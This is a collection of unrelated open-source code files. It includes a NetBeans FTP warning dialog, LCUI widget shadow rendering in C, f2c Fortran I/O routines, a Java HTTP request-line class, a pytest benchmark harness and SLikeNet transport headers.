m_pMinCornerDataPointer + (1 + m_maxCorner.m_line - m_minCorner.m_line) * m_depth * m_width);
}
} // namespace bcd
| 10,648 |
1,056 | /*
* Licensed to the Apache Software Foundation (ASF) under one
* or more contributor license agreements. See the NOTICE file
* distributed with this work for additional information
* regarding copyright ownership. The ASF licenses this file
* to you under the Apache License, Version 2.0 (the
* "License"); you may not use this file except in compliance
* with the License. You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing,
* software distributed under the License is distributed on an
* "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
* KIND, either express or implied. See the License for the
* specific language governing permissions and limitations
* under the License.
*/
package org.netbeans.modules.php.project.connections.ftp;
import java.awt.Cursor;
import java.awt.event.MouseAdapter;
import java.awt.event.MouseEvent;
import java.net.MalformedURLException;
import java.net.URL;
import javax.swing.GroupLayout;
import javax.swing.GroupLayout.Alignment;
import javax.swing.JCheckBox;
import javax.swing.JLabel;
import javax.swing.JPanel;
import javax.swing.JScrollPane;
import javax.swing.JTextPane;
import javax.swing.LayoutStyle.ComponentPlacement;
import javax.swing.UIManager;
import org.openide.DialogDisplayer;
import org.openide.NotifyDescriptor;
import org.openide.awt.HtmlBrowser;
import org.openide.awt.Mnemonics;
import org.openide.util.Exceptions;
import org.openide.util.NbBundle;
import org.openide.util.Utilities;
/**
* Warning about firewall issue on Windows and JDK 7, see issue #202021.
*/
public final class WindowsJdk7WarningPanel extends JPanel {
private static final long serialVersionUID = 54654646872L;
private static final boolean IS_WINDOWS = Utilities.isWindows();
private static final boolean IS_JDK7 = System.getProperty("java.version").startsWith("1.7."); // NOI18N
private static volatile Boolean windowsJdk7Warning;
private WindowsJdk7WarningPanel() {
initComponents();
}
/**
* Possibly open warning dialog.
*/
public static void warn() {
if (!showWindowsJdk7Warning()) {
return;
}
WindowsJdk7WarningPanel panel = new WindowsJdk7WarningPanel();
NotifyDescriptor descriptor = new NotifyDescriptor.Message(panel, NotifyDescriptor.WARNING_MESSAGE);
DialogDisplayer.getDefault().notify(descriptor);
if (panel.doNotShowAgainCheckBox.isSelected()) {
hideWindowsJdk7Warning();
}
}
private static boolean showWindowsJdk7Warning() {
if (windowsJdk7Warning == null) {
windowsJdk7Warning = IS_WINDOWS && IS_JDK7 && FtpPreferences.getInstance().getWindowsJdk7Warning();
}
return windowsJdk7Warning;
}
private static void hideWindowsJdk7Warning() {
windowsJdk7Warning = false;
FtpPreferences.getInstance().setWindowsJdk7Warning(false);
}
/** This method is called from within the constructor to
* initialize the form.
* WARNING: Do NOT modify this code. The content of this method is
* always regenerated by the Form Editor.
*/
@SuppressWarnings("unchecked")
// <editor-fold defaultstate="collapsed" desc="Generated Code">//GEN-BEGIN:initComponents
private void initComponents() {
infoLabel = new JLabel();
issueLinkLabel = new JLabel();
doNotShowAgainCheckBox = new JCheckBox();
infoScrollPane = new JScrollPane();
infoTextPane = new JTextPane();
Mnemonics.setLocalizedText(infoLabel, NbBundle.getMessage(WindowsJdk7WarningPanel.class, "WindowsJdk7WarningPanel.infoLabel.text")); // NOI18N
Mnemonics.setLocalizedText(issueLinkLabel, NbBundle.getMessage(WindowsJdk7WarningPanel.class, "WindowsJdk7WarningPanel.issueLinkLabel.text"));
issueLinkLabel.addMouseListener(new MouseAdapter() {
public void mouseEntered(MouseEvent evt) {
issueLinkLabelMouseEntered(evt);
}
public void mousePressed(MouseEvent evt) {
issueLinkLabelMousePressed(evt);
}
});
Mnemonics.setLocalizedText(doNotShowAgainCheckBox, NbBundle.getMessage(WindowsJdk7WarningPanel.class, "WindowsJdk7WarningPanel.doNotShowAgainCheckBox.text"));
infoScrollPane.setBorder(null);
infoTextPane.setBackground(UIManager.getDefaults().getColor("Label.background"));
infoTextPane.setBorder(null);
infoTextPane.setEditable(false);
infoTextPane.setText(NbBundle.getMessage(WindowsJdk7WarningPanel.class, "TXT_WinJdk7FtpWarning")); // NOI18N
infoScrollPane.setViewportView(infoTextPane);
GroupLayout layout = new GroupLayout(this);
this.setLayout(layout);
layout.setHorizontalGroup(
layout.createParallelGroup(Alignment.LEADING)
.addGroup(layout.createSequentialGroup()
.addGroup(layout.createParallelGroup(Alignment.LEADING)
.addComponent(infoLabel)
.addComponent(doNotShowAgainCheckBox))
.addContainerGap(116, Short.MAX_VALUE))
.addComponent(infoScrollPane, GroupLayout.DEFAULT_SIZE, 358, Short.MAX_VALUE)
.addGroup(layout.createSequentialGroup()
.addComponent(issueLinkLabel, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addContainerGap())
);
layout.setVerticalGroup(
layout.createParallelGroup(Alignment.LEADING)
.addGroup(layout.createSequentialGroup()
.addComponent(infoLabel)
.addPreferredGap(ComponentPlacement.RELATED)
.addComponent(infoScrollPane, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addPreferredGap(ComponentPlacement.UNRELATED)
.addComponent(issueLinkLabel, GroupLayout.PREFERRED_SIZE, GroupLayout.DEFAULT_SIZE, GroupLayout.PREFERRED_SIZE)
.addPreferredGap(ComponentPlacement.RELATED, 16, Short.MAX_VALUE)
.addComponent(doNotShowAgainCheckBox))
);
}// </editor-fold>//GEN-END:initComponents
private void issueLinkLabelMouseEntered(MouseEvent evt) {//GEN-FIRST:event_issueLinkLabelMouseEntered
evt.getComponent().setCursor(Cursor.getPredefinedCursor(Cursor.HAND_CURSOR));
}//GEN-LAST:event_issueLinkLabelMouseEntered
private void issueLinkLabelMousePressed(MouseEvent evt) {//GEN-FIRST:event_issueLinkLabelMousePressed
try {
URL url = new URL("http://bugs.sun.com/bugdatabase/view_bug.do?bug_id=7077696"); // NOI18N
HtmlBrowser.URLDisplayer.getDefault().showURL(url);
} catch (MalformedURLException ex) {
Exceptions.printStackTrace(ex);
}
}//GEN-LAST:event_issueLinkLabelMousePressed
// Variables declaration - do not modify//GEN-BEGIN:variables
private JCheckBox doNotShowAgainCheckBox;
private JLabel infoLabel;
private JScrollPane infoScrollPane;
private JTextPane infoTextPane;
private JLabel issueLinkLabel;
// End of variables declaration//GEN-END:variables
}
| 2,791 |
3,969 | /*
* widget_shadow.c -- widget shadow style processing module.
*
* Copyright (c) 2018-2020, <NAME> <<EMAIL>> All rights reserved.
*
* Redistribution and use in source and binary forms, with or without
* modification, are permitted provided that the following conditions are met:
*
* * Redistributions of source code must retain the above copyright notice,
* this list of conditions and the following disclaimer.
* * Redistributions in binary form must reproduce the above copyright
* notice, this list of conditions and the following disclaimer in the
* documentation and/or other materials provided with the distribution.
* * Neither the name of LCUI nor the names of its contributors may be used
* to endorse or promote products derived from this software without
* specific prior written permission.
*
* THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
* AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
* IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
* ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
* LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
* CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
* SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
* INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
* CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
* ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
* POSSIBILITY OF SUCH DAMAGE.
*/
#include <string.h>
#include <LCUI_Build.h>
#include <LCUI/LCUI.h>
#include <LCUI/gui/metrics.h>
#include <LCUI/gui/widget.h>
#include <LCUI/draw/boxshadow.h>
#include "widget_shadow.h"
static float ComputeXMetric(LCUI_Widget w, LCUI_Style s)
{
if (s->type == LCUI_STYPE_SCALE) {
return w->width * s->scale;
}
return LCUIMetrics_Compute(s->value, s->type);
}
static float ComputeYMetric(LCUI_Widget w, LCUI_Style s)
{
if (s->type == LCUI_STYPE_SCALE) {
return w->height * s->scale;
}
return LCUIMetrics_Compute(s->value, s->type);
}
void Widget_ComputeBoxShadowStyle(LCUI_Widget w)
{
int key;
LCUI_Style s;
LCUI_BoxShadowStyle *sd;
sd = &w->computed_style.shadow;
memset(sd, 0, sizeof(LCUI_BoxShadowStyle));
for (key = key_box_shadow_start; key <= key_box_shadow_end; ++key) {
s = &w->style->sheet[key];
if (!s->is_valid) {
continue;
}
switch (key) {
case key_box_shadow_x:
sd->x = ComputeXMetric(w, s);
break;
case key_box_shadow_y:
sd->y = ComputeYMetric(w, s);
break;
case key_box_shadow_spread:
sd->spread = LCUIMetrics_Compute(s->value, s->type);
break;
case key_box_shadow_blur:
sd->blur = LCUIMetrics_Compute(s->value, s->type);
break;
case key_box_shadow_color:
sd->color = s->color;
break;
default:
break;
}
}
}
float Widget_GetBoxShadowOffsetX(LCUI_Widget w)
{
const LCUI_BoxShadowStyle *shadow;
shadow = &w->computed_style.shadow;
if (shadow->x >= SHADOW_WIDTH(shadow)) {
return 0;
}
return SHADOW_WIDTH(shadow) - shadow->x;
}
float Widget_GetBoxShadowOffsetY(LCUI_Widget w)
{
const LCUI_BoxShadowStyle *shadow;
shadow = &w->computed_style.shadow;
if (shadow->y >= SHADOW_WIDTH(shadow)) {
return 0;
}
return SHADOW_WIDTH(shadow) - shadow->y;
}
float Widget_GetCanvasWidth(LCUI_Widget widget)
{
float width;
const LCUI_BoxShadowStyle *shadow;
width = widget->box.border.width;
shadow = &widget->computed_style.shadow;
if (shadow->x >= SHADOW_WIDTH(shadow)) {
return width + SHADOW_WIDTH(shadow) + shadow->x;
} else if (shadow->x <= -SHADOW_WIDTH(shadow)) {
return width + SHADOW_WIDTH(shadow) - shadow->x;
}
return width + SHADOW_WIDTH(shadow) * 2;
}
float Widget_GetCanvasHeight(LCUI_Widget widget)
{
float height;
const LCUI_BoxShadowStyle *shadow;
height = widget->box.border.height;
shadow = &widget->computed_style.shadow;
if (shadow->y >= SHADOW_WIDTH(shadow)) {
return height + SHADOW_WIDTH(shadow) + shadow->y;
} else if (shadow->y <= -SHADOW_WIDTH(shadow)) {
return height + SHADOW_WIDTH(shadow) - shadow->y;
}
return height + SHADOW_WIDTH(shadow) * 2;
}
#define ComputeActual(X) LCUIMetrics_ComputeActual(X, LCUI_STYPE_PX)
void Widget_ComputeBoxShadow(LCUI_Widget w, LCUI_BoxShadow *out)
{
LCUI_BoxShadowStyle *s;
LCUI_BorderStyle *b;
b = &w->computed_style.border;
s = &w->computed_style.shadow;
out->x = ComputeActual(s->x);
out->y = ComputeActual(s->y);
out->blur = ComputeActual(s->blur);
out->spread = ComputeActual(s->spread);
out->color = s->color;
out->top_left_radius = ComputeActual(b->top_left_radius);
out->top_right_radius = ComputeActual(b->top_right_radius);
out->bottom_left_radius = ComputeActual(b->bottom_left_radius);
out->bottom_right_radius = ComputeActual(b->bottom_right_radius);
}
void Widget_PaintBoxShadow(LCUI_Widget w, LCUI_PaintContext paint,
LCUI_WidgetActualStyle style)
{
LCUI_Rect box;
box.x = box.y = 0;
box.width = style->canvas_box.width;
box.height = style->canvas_box.height;
BoxShadow_Paint(&style->shadow, &box, style->border_box.width,
style->border_box.height, paint);
}
| 1,996 |
2,542 | <filename>src/prod/src/Reliability/Failover/ra/ReplicaProxyStates.cpp
// ------------------------------------------------------------
// Copyright (c) Microsoft Corporation. All rights reserved.
// Licensed under the MIT License (MIT). See License.txt in the repo root for license information.
// ------------------------------------------------------------
#include "Ra.Stdafx.h"
using namespace Common;
namespace Reliability
{
namespace ReconfigurationAgentComponent
{
namespace ReplicaProxyStates
{
ENUM_STRUCTURED_TRACE(ReplicaProxyStates, Ready, LastValidEnum);
void WriteToTextWriter(TextWriter & w, Enum const & val)
{
switch (val)
{
case Ready:
w << L"RD"; return;
case InBuild:
w << L"IB"; return;
case InDrop:
w << L"ID"; return;
case Dropped:
w << L"DD"; return;
default:
Assert::CodingError("Unknown Replica Proxy State");
}
}
}
}
}
| 580 |
945 | <reponame>arobert01/ITK
#include "v3p_f2c.h"
#include "fio.h"
#ifdef __cplusplus
extern "C" {
#endif
uiolen f__reclen;
int
#ifdef KR_headers
do_us(number,ptr,len) ftnint *number; char *ptr; ftnlen len;
#else
do_us(ftnint *number, char *ptr, ftnlen len)
#endif
{
if(f__reading)
{
f__recpos += (int)(*number * len);
if(f__recpos>f__reclen)
err(f__elist->cierr, 110, "do_us");
if (fread(ptr,(int)len,(int)(*number),f__cf) != *number)
err(f__elist->ciend, EOF, "do_us");
return(0);
}
else
{
f__reclen += *number * len;
(void) fwrite(ptr,(int)len,(int)(*number),f__cf);
return(0);
}
}
#ifdef KR_headers
integer do_ud(number,ptr,len) ftnint *number; char *ptr; ftnlen len;
#else
integer do_ud(ftnint *number, char *ptr, ftnlen len)
#endif
{
f__recpos += (int)(*number * len);
if(f__recpos > f__curunit->url && f__curunit->url!=1)
err(f__elist->cierr,110,"do_ud");
if(f__reading)
{
#ifdef Pad_UDread
#ifdef KR_headers
int i;
#else
size_t i;
#endif
if (!(i = fread(ptr,(int)len,(int)(*number),f__cf))
&& !(f__recpos - *number*len))
err(f__elist->cierr,EOF,"do_ud")
if (i < *number)
memset(ptr + i*len, 0, (*number - i)*len);
return 0;
#else
if(fread(ptr,(int)len,(int)(*number),f__cf) != *number)
err(f__elist->cierr,EOF,"do_ud")
else return(0);
#endif
}
(void) fwrite(ptr,(int)len,(int)(*number),f__cf);
return(0);
}
#ifdef KR_headers
integer do_uio(number,ptr,len) ftnint *number; char *ptr; ftnlen len;
#else
integer do_uio(ftnint *number, char *ptr, ftnlen len)
#endif
{
if(f__sequential)
return(do_us(number,ptr,len));
else return(do_ud(number,ptr,len));
}
#ifdef __cplusplus
}
#endif
| 1,199 |
403 | <filename>craft-atom-protocol-http/src/main/java/io/craft/atom/protocol/http/model/HttpRequestLine.java
package io.craft.atom.protocol.http.model;
import static io.craft.atom.protocol.http.HttpConstants.S_CR;
import static io.craft.atom.protocol.http.HttpConstants.S_LF;
import static io.craft.atom.protocol.http.HttpConstants.S_SP;
import lombok.Getter;
import lombok.Setter;
import lombok.ToString;
/**
* The Request-Line begins with a method token, followed by the Request-URI and the protocol version,
* and ending with CRLF. The elements are separated by SP characters. <br>
* No CR or LF is allowed except in the final CRLF sequence.
*
* <pre>
* Request-Line = Method SP Request-URI SP HTTP-Version CRLF
* </pre>
*
* @author mindwind
* @version 1.0, Feb 1, 2013
* @see HttpRequest
*/
@ToString(callSuper = true, of = { "method", "uri" })
public class HttpRequestLine extends HttpStartLine {
private static final long serialVersionUID = 1393510808581169505L;
@Getter @Setter private HttpMethod method;
@Getter @Setter private String uri ;
// ~ ------------------------------------------------------------------------------------------------------------
public HttpRequestLine() {
super();
}
public HttpRequestLine(HttpMethod method, String uri, HttpVersion version) {
super(version);
this.method = method;
this.uri = uri;
}
// ~ ------------------------------------------------------------------------------------------------------------
public String toHttpString() {
StringBuilder sb = new StringBuilder();
sb.append(getMethod()).append(S_SP).append(getUri()).append(S_SP).append(getVersion().getValue()).append(S_CR).append(S_LF);
return sb.toString();
}
}
| 552 |
482 | <reponame>lifecontrol/cattle
from common_fixtures import * # NOQA
from copy import deepcopy
def made_log(object, admin_user_client, context, accountId=None):
t = object.type
if t == 'stack':
t = 'stack'
logs = admin_user_client.list_audit_log(resourceId=object.id,
resourceType=t)
assert len(logs) == 1
assert logs[0].resourceType == t
if str(logs[0].resourceId) != object.id:
assert str(logs[0].resourceId).replace('1s', '1e') == object.id
else:
assert str(logs[0].resourceId) == object.id
if accountId is None:
assert logs[0].accountId == context.project.id
else:
assert logs[0].accountId == accountId
assert logs[0].authenticatedAsAccountId == context.account.id
def test_audit_entry_created(new_context, admin_user_client):
objects = []
new_headers = deepcopy(new_context.user_client._headers)
new_headers['X-API-Project-Id'] = new_context.project.id
made_log(new_context.user_client.create_project(), admin_user_client,
new_context, accountId=new_context.account.id)
new_context.user_client._headers = new_headers
new_context.user_client.reload_schema()
objects.append(new_context.user_client.create_container(
imageUuid=new_context.image_uuid))
objects.append(new_context.user_client.create_container(
imageUuid=new_context.image_uuid))
objects.append(new_context.user_client.create_api_key())
objects.append(new_context.user_client.create_registry(
serverAddress='test.io', name='test'))
objects.append(new_context.user_client.create_api_key())
objects.append(new_context.user_client.create_stack(
name='env-' + random_str()))
for object in objects:
made_log(object, admin_user_client, new_context)
| 754 |
476 | <filename>microbench/conftest.py
import re
import time
from collections import defaultdict
import pytest
import _valgrind
class Timer:
def __init__(self, nodeid):
self.nodeid = nodeid
self.start = None
self.stop = None
def __enter__(self):
if self.start is not None:
raise ValueError('You cannot use "with timer:" more than once')
_valgrind.lib.callgrind_start()
self.start = time.time()
def __exit__(self, etype, evalue, tb):
self.stop = time.time()
_valgrind.lib.callgrind_stop()
def __str__(self):
if self.start is None:
return '[NO TIMING]'
if self.stop is None:
return '[IN-PROGRESS]'
usec = (self.stop - self.start) * 1000
return f'{usec:.2f} us'
@property
def elapsed(self):
if self.start is not None and self.stop is not None:
return self.stop - self.start
return None
class TimerSession:
NODEID = re.compile(r'(.*)\[(.*)\]')
def __init__(self):
self.apis = set() # ['cpy', 'hpy', ...]
self.table = defaultdict(dict) # {shortid: {api: timer}}
self.timers = {} # nodeid -> Timer
def new_timer(self, nodeid):
shortid, api = self.split_nodeid(nodeid)
timer = Timer(nodeid)
self.apis.add(api)
self.table[shortid][api] = timer
self.timers[nodeid] = timer
return timer
def get_timer(self, nodeid):
return self.timers.get(nodeid)
def split_nodeid(self, nodeid):
shortid = '::'.join(nodeid.split('::')[-2:]) # take only class::function
m = self.NODEID.match(shortid)
if not m:
return shortid, ''
return m.group(1), m.group(2)
def format_ratio(self, reference, value):
if reference and reference.elapsed and value and value.elapsed:
ratio = value.elapsed / reference.elapsed
return f'[{ratio:.2f}]'
return ''
def display_summary(self, tr):
w = tr.write_line
w('')
tr.write_sep('=', 'BENCHMARKS', cyan=True)
w(' '*40 + ' cpy hpy')
w(' '*40 + '---------------- -------------------')
for shortid, timings in self.table.items():
cpy = timings.get('cpy')
hpy = timings.get('hpy')
hpy_ratio = self.format_ratio(cpy, hpy)
cpy = cpy or ''
hpy = hpy or ''
w(f'{shortid:<40} {cpy!s:>15} {hpy!s:>15} {hpy_ratio}')
w('')
@pytest.fixture
def timer(request, api):
nodeid = request.node.nodeid
return request.config._timersession.new_timer(nodeid)
def pytest_configure(config):
config._timersession = TimerSession()
config.addinivalue_line("markers", "hpy: mark modules using the HPy API")
config.addinivalue_line("markers", "cpy: mark modules using the old Python/C API")
def pytest_addoption(parser):
parser.addoption(
"--fast", action="store_true", default=False, help="run microbench faster"
)
parser.addoption(
"--slow", action="store_true", default=False, help="run microbench slower"
)
VERBOSE_TEST_NAME_LENGTH = 90
@pytest.hookimpl(hookwrapper=True)
def pytest_report_teststatus(report, config):
outcome = yield
category, letter, word = outcome.get_result()
timer = config._timersession.get_timer(report.nodeid)
if category == 'passed' and timer:
L = VERBOSE_TEST_NAME_LENGTH - len(report.nodeid)
word = str(timer).rjust(L)
markup = None
if timer.elapsed is None:
markup = {'yellow': True}
outcome.force_result((category, letter, (word, markup)))
def pytest_terminal_summary(terminalreporter, config):
config._timersession.display_summary(terminalreporter)
| 1,741 |
12,940 | <reponame>dciborow/azure-quickstart-templates
{
"$schema": "https://aka.ms/azure-quickstart-templates-metadata-schema#",
"type": "QuickStart",
"itemDisplayName": "Provision a Mobile App with a SQL Database",
"description": "This template provisions a Mobile App, SQL Database, and Notification Hub. It configures a connection string in the mobile app for the database and notification hub.",
"summary": "Provision a Mobile App with a SQL Database",
"githubUsername": "mattchenderson",
"dateUpdated": "2021-05-11"
} | 158 |
2,338 | //===-- Implementation header for isalnum -------------------------*-C++-*-===//
//
// Part of the LLVM Project, under the Apache License v2.0 with LLVM Exceptions.
// See https://llvm.org/LICENSE.txt for license information.
// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception
//
//===----------------------------------------------------------------------===//
#ifndef LLVM_LIBC_SRC_CTYPE_ISALNUM_H
#define LLVM_LIBC_SRC_CTYPE_ISALNUM_H
namespace __llvm_libc {
int isalnum(int c);
} // namespace __llvm_libc
#endif // LLVM_LIBC_SRC_CTYPE_ISALNUM_H
| 197 |
1,865 | <filename>stethoscope/api/defaults.py
# vim: set fileencoding=utf-8 :
from __future__ import absolute_import, print_function, unicode_literals
import os
import stethoscope.utils
LOGFILE = os.environ.get('STETHOSCOPE_API_LOGFILE', os.environ.get('LOGFILE', 'api.log'))
LOGBOOK = stethoscope.utils.setup_logbook(LOGFILE, logfile_kwargs={'delay': True})
DEBUG = True
TESTING = True
JWT_ALGORITHM = 'HS256'
JWT_EXPIRATION_DELTA = 60 * 60 * 24
def IS_PRIVILEGED_USER(userinfo):
return userinfo['sub'] == '*'
MOBILE_PLATFORMS = ['Android', 'iOS']
NONMOBILE_PLATFORMS = ['Mac', 'Windows']
PRACTICES = {
'jailed': {
'KEY': 'jailed',
'DISPLAY_TITLE': 'Verified Operating System',
'DESCRIPTION': (
"Modifying the basic operating system (known as \"jailbreaking\" or \"rooting\") "
"of a device increases the risk of infection or compromise by exposing additional "
"security vulnerabilities."
),
'LINK': '#',
'STATUS_IF_MISSING': 'warn',
'NA_PLATFORMS': NONMOBILE_PLATFORMS,
},
'encryption': {
'KEY': 'encryption',
'DISPLAY_TITLE': 'Disk Encryption',
'DESCRIPTION': (
"Full-disk encryption protects data at rest from being accessed by a "
"party who does not know the password or decryption key."
),
'LINK': '#',
'STATUS_IF_MISSING': 'warn',
'PLATFORM_REQUIRED': True,
},
'uptodate': {
'KEY': 'uptodate',
'DISPLAY_TITLE': 'Up-to-date',
'DESCRIPTION': (
"One of the most important things you can do to secure your device(s) is to "
"keep your operating system and software up to date. New vulnerabilities and "
"weaknesses are found every day, so frequent updates are essential to ensuring "
"your device(s) include the latest fixes and preventative measures."
),
'LINK': '#',
'REQUIRED_VERSIONS': {
'Mac OS X': '10.11.0',
'iOS': '9.3.5',
'Android': '6.0.0',
},
'RECOMMENDED_VERSIONS': {
'Mac OS X': '10.11.6',
'iOS': '9.3.5',
'Android': '6.0.1',
}
},
'autoupdate': {
'KEY': 'autoupdate',
'DISPLAY_TITLE': 'Automatic Updates',
'DESCRIPTION': (
"One of the most important things you can do to secure your device(s) is to "
"keep your operating system and software up to date. New vulnerabilities and "
"weaknesses are found every day, so frequent updates are essential to ensuring "
"your device(s) include the latest fixes and preventative measures. "
"Enabling automatic updating helps ensure your machine is up-to-date without "
"having to manually install updates."
),
'LINK': '#',
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': MOBILE_PLATFORMS,
},
'firewall': {
'KEY': 'firewall',
'DISPLAY_TITLE': 'Firewall',
'DESCRIPTION': (
"Firewalls control network traffic into and out of a system. Enabling the firewall on "
"your device can prevent network-based attacks on your system, and is especially "
"important if you make use of insecure wireless networks (such as at coffee shops and "
"airports)."
),
'LINK': '#',
'STATUS_IF_MISSING': 'warn',
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': MOBILE_PLATFORMS,
},
'remotelogin': {
'KEY': 'remotelogin',
'DISPLAY_TITLE': 'Remote Login Disabled',
'DESCRIPTION': (
"The 'Remote Login' setting on your Mac controls whether users can login remotely "
"to the system using SSH. If you don't know what this is or why you would want it, "
"you should disable 'Remote Login'."
),
'LINK': '#',
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': MOBILE_PLATFORMS + ["Windows"],
},
'screenlock': {
'KEY': 'screenlock',
'DISPLAY_TITLE': 'Screen Lock',
'DESCRIPTION': (
"Screen locks, or screen saver locks, prevent unauthorized third-parties from "
"accessing your laptop when unattended by requiring a password to dismiss the screen "
"saver or wake from \"sleep\" mode. Setting the timeout, i.e., the length of idle "
"time before the screen saver takes effect, to 10 minutes or less is also recommended."
),
'LINK': '#',
'STATUS_IF_MISSING': 'warn',
},
'sentinel': {
'KEY': 'sentinel',
'SOFTWARE_NAMES': ['Sentinel Agent'],
'SERVICE_NAMES': ['com.sentinelone.sentineld'],
'DISPLAY_TITLE': 'SentinelOne',
'DESCRIPTION': (
"SentinelOne is part of our approach to preventing and detecting malware "
"infections. Installing SentinelOne helps protect your system and helps us detect "
"when a system has been compromised, and how, so we can respond quickly and "
"effectively."
),
'LINK': '#',
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': MOBILE_PLATFORMS,
},
'carbonblack': {
'KEY': 'carbonblack',
'SOFTWARE_NAMES': ['Carbon Black Sensor'],
'SERVICE_NAMES': ['com.carbonblack.daemon'],
'DISPLAY_TITLE': 'Carbon Black',
'DESCRIPTION': (
"Carbon Black is part of our approach to preventing and detecting malware "
"infections. Installing Carbon Black helps protect your system and helps us "
"detect when a system has been compromised, and how, so we can respond quickly and "
"effectively."
),
'LINK': '#',
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': MOBILE_PLATFORMS,
},
'unknownsources': {
'KEY': 'unknownsources',
'DISPLAY_TITLE': 'Unknown Sources Disabled',
'DESCRIPTION': (
"Apps from unknown sources are more likely to contain malware than apps "
"downloaded from the Play Store. Keeping this setting disabled prevents "
"the installation of these apps."
),
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': ['iOS'] + NONMOBILE_PLATFORMS,
},
'adbstatus': {
'KEY': 'adbstatus',
'DISPLAY_TITLE': 'Android Debug Bridge Disabled',
'DESCRIPTION': (
"The Android Debug Bridge (ADB) is a debugging tool intended for use by Android developers. "
"Enabling ADB provides enhanced access to a device via both USB and wireless interfaces, "
"which presents a security risk (one that has been exploited in the past)."
),
'PLATFORM_REQUIRED': True,
'NA_PLATFORMS': ['iOS'] + NONMOBILE_PLATFORMS,
},
}
| 2,369 |
4,098 | <filename>Source/ThirdParty/SLikeNet/Source/include/slikenet/transport2.h
/*
* Original work: Copyright (c) 2014, Oculus VR, Inc.
* All rights reserved.
*
* This source code is licensed under the BSD-style license found in the
* RakNet License.txt file in the licenses directory of this source tree. An additional grant
* of patent rights can be found in the RakNet Patents.txt file in the same directory.
*
*
* Modified work: Copyright (c) 2017, SLikeSoft UG (haftungsbeschränkt)
*
* This source code was modified by SLikeSoft. Modifications are licensed under the MIT-style
* license found in the license.txt file in the root directory of this source tree.
*/
/// \file
/// \brief Contains RakNetTransportCommandParser and RakNetTransport used to provide a secure console connection.
///
#include "NativeFeatureIncludes.h"
#if _RAKNET_SUPPORT_TelnetTransport==1
#ifndef __RAKNET_TRANSPORT_2
#define __RAKNET_TRANSPORT_2
#include "TransportInterface.h"
#include "DS_Queue.h"
#include "CommandParserInterface.h"
#include "PluginInterface2.h"
#include "Export.h"
namespace SLNet
{
/// Forward declarations
class BitStream;
class RakPeerInterface;
class RakNetTransport;
/// \defgroup RAKNET_TRANSPORT_GROUP RakNetTransport
/// \brief UDP based transport implementation for the ConsoleServer
/// \details
/// \ingroup PLUGINS_GROUP
/// \brief Use RakNetTransport if you need a secure connection between the client and the console server.
/// \details RakNetTransport automatically initializes security for the system. Use the project CommandConsoleClient to connect
/// To the ConsoleServer if you use RakNetTransport
/// \ingroup RAKNET_TRANSPORT_GROUP
class RAK_DLL_EXPORT RakNetTransport2 : public TransportInterface, public PluginInterface2
{
public:
// GetInstance() and DestroyInstance(instance*)
STATIC_FACTORY_DECLARATIONS(RakNetTransport2)
RakNetTransport2();
virtual ~RakNetTransport2();
/// Start the transport provider on the indicated port.
/// \param[in] port The port to start the transport provider on
/// \param[in] serverMode If true, you should allow incoming connections (I don't actually use this anywhere)
/// \return Return true on success, false on failure.
bool Start(unsigned short port, bool serverMode);
/// Stop the transport provider. You can clear memory and shutdown threads here.
void Stop(void);
/// Send a null-terminated string to \a systemAddress
/// If your transport method requires particular formatting of the outgoing data (e.g. you don't just send strings) you can do it here
/// and parse it out in Receive().
/// \param[in] systemAddress The player to send the string to
/// \param[in] data format specifier - same as RAKNET_DEBUG_PRINTF
/// \param[in] ... format specification arguments - same as RAKNET_DEBUG_PRINTF
void Send( SystemAddress systemAddress, const char *data, ... );
/// Disconnect \a systemAddress . The binary address and port defines the SystemAddress structure.
/// \param[in] systemAddress The player/address to disconnect
void CloseConnection( SystemAddress systemAddress );
/// Return a string. The string should be allocated and written to Packet::data .
/// The byte length should be written to Packet::length . The player/address should be written to Packet::systemAddress
/// If your transport protocol adds special formatting to the data stream you should parse it out before returning it in the packet
/// and thus only return a string in Packet::data
/// \return The packet structure containing the result of Receive, or 0 if no data is available
Packet* Receive( void );
/// Deallocate the Packet structure returned by Receive
/// \param[in] The packet to deallocate
void DeallocatePacket( Packet *packet );
/// If a new system connects to you, you should queue that event and return the systemAddress/address of that player in this function.
/// \return The SystemAddress/address of the system
SystemAddress HasNewIncomingConnection(void);
/// If a system loses the connection, you should queue that event and return the systemAddress/address of that player in this function.
/// \return The SystemAddress/address of the system
SystemAddress HasLostConnection(void);
virtual CommandParserInterface* GetCommandParser(void) {return 0;}
/// \internal
virtual PluginReceiveResult OnReceive(Packet *packet);
/// \internal
virtual void OnClosedConnection(const SystemAddress &systemAddress, RakNetGUID rakNetGUID, PI2_LostConnectionReason lostConnectionReason );
/// \internal
virtual void OnNewConnection(const SystemAddress &systemAddress, RakNetGUID rakNetGUID, bool isIncoming);
protected:
DataStructures::Queue<SystemAddress> newConnections, lostConnections;
DataStructures::Queue<Packet*> packetQueue;
};
} // namespace SLNet
#endif
#endif // _RAKNET_SUPPORT_*
| 1,448 |
